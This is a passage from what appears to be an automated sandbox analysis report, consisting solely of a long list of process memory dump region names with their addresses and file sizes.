                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4048-381-0x00000000070A0000-0x00000000070A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4048-329-0x0000000006B50000-0x0000000006B51000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4048-328-0x00000000045C0000-0x00000000045C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4048-331-0x0000000007190000-0x0000000007191000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4048-376-0x0000000006FD0000-0x0000000006FD1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4056-360-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4056-357-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4056-361-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4056-349-0x0000000003920000-0x000000000395C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    240KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4056-359-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4056-352-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4056-358-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4056-353-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4056-354-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4056-346-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4056-356-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4064-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4072-297-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4072-310-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4072-312-0x0000000000430000-0x000000000057A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    1.3MB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4120-255-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4156-256-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4324-375-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4488-324-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4520-350-0x00000000009F0000-0x00000000009F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4520-330-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4520-338-0x0000000077E20000-0x0000000077FAE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    1.6MB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4520-336-0x0000000000B50000-0x0000000000B51000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4604-274-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4644-393-0x0000000007210000-0x0000000007211000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4644-306-0x0000000005C10000-0x0000000005C11000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4644-392-0x0000000006B10000-0x0000000006B11000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4644-325-0x0000000005960000-0x0000000005961000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4644-298-0x0000000000418E5A-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4644-308-0x0000000005650000-0x0000000005651000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4644-296-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    120KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4644-318-0x0000000005600000-0x0000000005C06000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    6.0MB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4644-315-0x00000000056F0000-0x00000000056F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4644-311-0x00000000056B0000-0x00000000056B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4700-384-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4708-321-0x000000001B410000-0x000000001B412000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4708-295-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4760-285-0x0000000000402E1A-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4760-284-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    36KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4856-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4856-265-0x00000000003B0000-0x00000000003B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4856-273-0x0000000004B80000-0x0000000004B81000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4868-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4868-290-0x00000000047A0000-0x00000000047EA000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    296KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4868-287-0x0000000000400000-0x0000000002C81000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    40.5MB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4880-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4892-292-0x0000000002C80000-0x0000000002D2E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    696KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4892-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4892-289-0x0000000000400000-0x0000000002C79000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    40.5MB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4900-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4900-269-0x0000000000460000-0x0000000000461000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4900-283-0x0000000005400000-0x0000000005401000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4900-282-0x0000000004EF0000-0x0000000004EF1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4900-281-0x00000000026E0000-0x00000000026E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4900-278-0x0000000004CA0000-0x0000000004CA1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4932-347-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4936-377-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4944-339-0x00000000052A0000-0x0000000005BC6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    9.1MB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4944-351-0x0000000000400000-0x000000000309A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    44.6MB

                                                                                                                                                                                                                                                                                                                                                                  • memory/4944-293-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4976-294-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/4988-247-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/5000-248-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/5060-341-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/5060-348-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    80KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/5064-288-0x0000000000400000-0x0000000002C6A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    40.4MB

                                                                                                                                                                                                                                                                                                                                                                  • memory/5064-291-0x00000000001D0000-0x00000000001D9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    36KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/5064-253-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/5072-254-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/5072-286-0x00000000001E0000-0x00000000001EA000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    40KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/5336-394-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/5360-395-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/5360-398-0x0000000000420000-0x0000000000421000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/5360-405-0x0000000002310000-0x000000000233C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    176KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/5404-410-0x00000000006D0000-0x00000000006D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/5404-399-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/5404-419-0x0000000002850000-0x000000000287B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    172KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/5420-401-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/5456-402-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/5744-421-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/5744-422-0x0000000000400000-0x0000000000455000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                    340KB

                                                                                                                                                                                                                                                                                                                                                                  • memory/5856-433-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/5912-443-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/5968-436-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                  • memory/6092-445-0x0000000000000000-mapping.dmp